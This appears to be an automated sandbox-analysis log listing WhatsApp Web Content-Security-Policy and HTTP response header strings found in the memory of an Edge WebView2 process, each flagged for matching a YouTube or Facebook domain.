                  Source: msedgewebview2.exe, 0000001D.00000002.3707687086.00002DDC00E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;- equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B440046E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugGKsC7mIB0ZD0tYkV7Eg6H8TVONCDoSTDunZRQq+UiugRzmGxbjLfvun9w+Zm8EhlKAOeFJUMbapxQbpXDxDHrg==content-length89210dateSun, 10 Mar 2024 16:46:08 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=203, rtx=0, c=30, mss=1232, tbw=64223, tp=63, tpl=0, uplat=3, ullat=-1alt-svch3=":443"; ma=86400priorityu=1Accept-Encoding, Referer equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B440046E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugGKsC7mIB0ZD0tYkV7Eg6H8TVONCDoSTDunZRQq+UiugRzmGxbjLfvun9w+Zm8EhlKAOeFJUMbapxQbpXDxDHrg==content-length89210dateSun, 10 Mar 2024 16:46:08 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=203, rtx=0, c=30, mss=1232, tbw=64223, tp=63, tpl=0, uplat=3, ullat=-1alt-svch3=":443"; ma=86400priorityu=1Accept-Encoding, Referer equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B440046E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugGKsC7mIB0ZD0tYkV7Eg6H8TVONCDoSTDunZRQq+UiugRzmGxbjLfvun9w+Zm8EhlKAOeFJUMbapxQbpXDxDHrg==content-length89210dateSun, 10 Mar 2024 16:46:08 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=203, rtx=0, c=30, mss=1232, tbw=64223, tp=63, tpl=0, uplat=3, ullat=-1alt-svch3=":443"; ma=86400priorityu=1Accept-Encoding, RefererAccept-Encoding equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B440046E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugGKsC7mIB0ZD0tYkV7Eg6H8TVONCDoSTDunZRQq+UiugRzmGxbjLfvun9w+Zm8EhlKAOeFJUMbapxQbpXDxDHrg==content-length89210dateSun, 10 Mar 2024 16:46:08 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=203, rtx=0, c=30, mss=1232, tbw=64223, tp=63, tpl=0, uplat=3, ullat=-1alt-svch3=":443"; ma=86400priorityu=1Accept-Encoding, RefererAccept-Encoding equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2552003948.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugk8D9LXQBVg+9/In07Nd9YbIQieGXFCoYZwafuzstzA4TX9Xd2XwIEKAu5oufswiaecl8R6InDfLQIkkdHQK+8Q==dateSun, 10 Mar 2024 16:46:25 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=213, rtx=0, c=1560, mss=1232, tbw=2581049, tp=2162, tpl=0, uplat=21, ullat=0alt-svch3=":443"; ma=86400priorityu=1,i equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2552003948.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugk8D9LXQBVg+9/In07Nd9YbIQieGXFCoYZwafuzstzA4TX9Xd2XwIEKAu5oufswiaecl8R6InDfLQIkkdHQK+8Q==dateSun, 10 Mar 2024 16:46:25 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=213, rtx=0, c=1560, mss=1232, tbw=2581049, tp=2162, tpl=0, uplat=21, ullat=0alt-svch3=":443"; ma=86400priorityu=1,i equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugmoQfMemwpM/Uliw5Uco5hv5cZ0o4w/paCFEhjhvH+olfOOG5uPG1QW9iVig/TJ3MLqxbx7nERFAlCsPpzqnzvw==content-length399dateSun, 10 Mar 2024 16:46:27 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611667, tp=3815, tpl=0, uplat=4, ullat=-1alt-svch3=":443"; ma=86400priorityu=3,iAccept-Encoding, Referer equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugmoQfMemwpM/Uliw5Uco5hv5cZ0o4w/paCFEhjhvH+olfOOG5uPG1QW9iVig/TJ3MLqxbx7nERFAlCsPpzqnzvw==content-length399dateSun, 10 Mar 2024 16:46:27 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611667, tp=3815, tpl=0, uplat=4, ullat=-1alt-svch3=":443"; ma=86400priorityu=3,iAccept-Encoding, Referer equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugmoQfMemwpM/Uliw5Uco5hv5cZ0o4w/paCFEhjhvH+olfOOG5uPG1QW9iVig/TJ3MLqxbx7nERFAlCsPpzqnzvw==content-length399dateSun, 10 Mar 2024 16:46:27 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611667, tp=3815, tpl=0, uplat=4, ullat=-1alt-svch3=":443"; ma=86400priorityu=3,iAccept-Encoding, RefererAccept-Encoding equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster?0strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugmoQfMemwpM/Uliw5Uco5hv5cZ0o4w/paCFEhjhvH+olfOOG5uPG1QW9iVig/TJ3MLqxbx7nERFAlCsPpzqnzvw==content-length399dateSun, 10 Mar 2024 16:46:27 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611667, tp=3815, tpl=0, uplat=4, ullat=-1alt-svch3=":443"; ma=86400priorityu=3,iAccept-Encoding, RefererAccept-Encoding equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugMACSAskZOFlggSvxAYa0ikFcAKz03obIvt/rm3/lMtJilq3jeETSEUGJSRHrXJJXFMt20sB6oEjsGVo0x0xrow==content-length1235163dateSun, 10 Mar 2024 16:46:27 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=231, rtx=0, c=1646, mss=1232, tbw=2773497, tp=2322, tpl=0, uplat=2, ullat=-1alt-svch3=":443"; ma=86400priorityu=3,iAccept-Encoding, Referer equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugMACSAskZOFlggSvxAYa0ikFcAKz03obIvt/rm3/lMtJilq3jeETSEUGJSRHrXJJXFMt20sB6oEjsGVo0x0xrow==content-length1235163dateSun, 10 Mar 2024 16:46:27 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=231, rtx=0, c=1646, mss=1232, tbw=2773497, tp=2322, tpl=0, uplat=2, ullat=-1alt-svch3=":443"; ma=86400priorityu=3,iAccept-Encoding, Referer equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugMACSAskZOFlggSvxAYa0ikFcAKz03obIvt/rm3/lMtJilq3jeETSEUGJSRHrXJJXFMt20sB6oEjsGVo0x0xrow==content-length1235163dateSun, 10 Mar 2024 16:46:27 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=231, rtx=0, c=1646, mss=1232, tbw=2773497, tp=2322, tpl=0, uplat=2, ullat=-1alt-svch3=":443"; ma=86400priorityu=3,iAccept-Encoding, RefererAccept-Encoding equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugMACSAskZOFlggSvxAYa0ikFcAKz03obIvt/rm3/lMtJilq3jeETSEUGJSRHrXJJXFMt20sB6oEjsGVo0x0xrow==content-length1235163dateSun, 10 Mar 2024 16:46:27 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=231, rtx=0, c=1646, mss=1232, tbw=2773497, tp=2322, tpl=0, uplat=2, ullat=-1alt-svch3=":443"; ma=86400priorityu=3,iAccept-Encoding, RefererAccept-Encoding equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugV6D/6J3BjwTnpCdhr8MLGazlYKchR4JPWNXmLo94m/CDNOBdgtefUNfbiLGHBBaMZXJTTXjjmUDvBW5IJjbTxQ==content-length54344dateSun, 10 Mar 2024 16:46:08 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=222, rtx=0, c=14, mss=1232, tbw=19966, tp=24, tpl=0, uplat=3, ullat=-1alt-svch3=":443"; ma=86400priorityu=0Accept-Encoding, Referer equals www.facebook.com (Facebook)
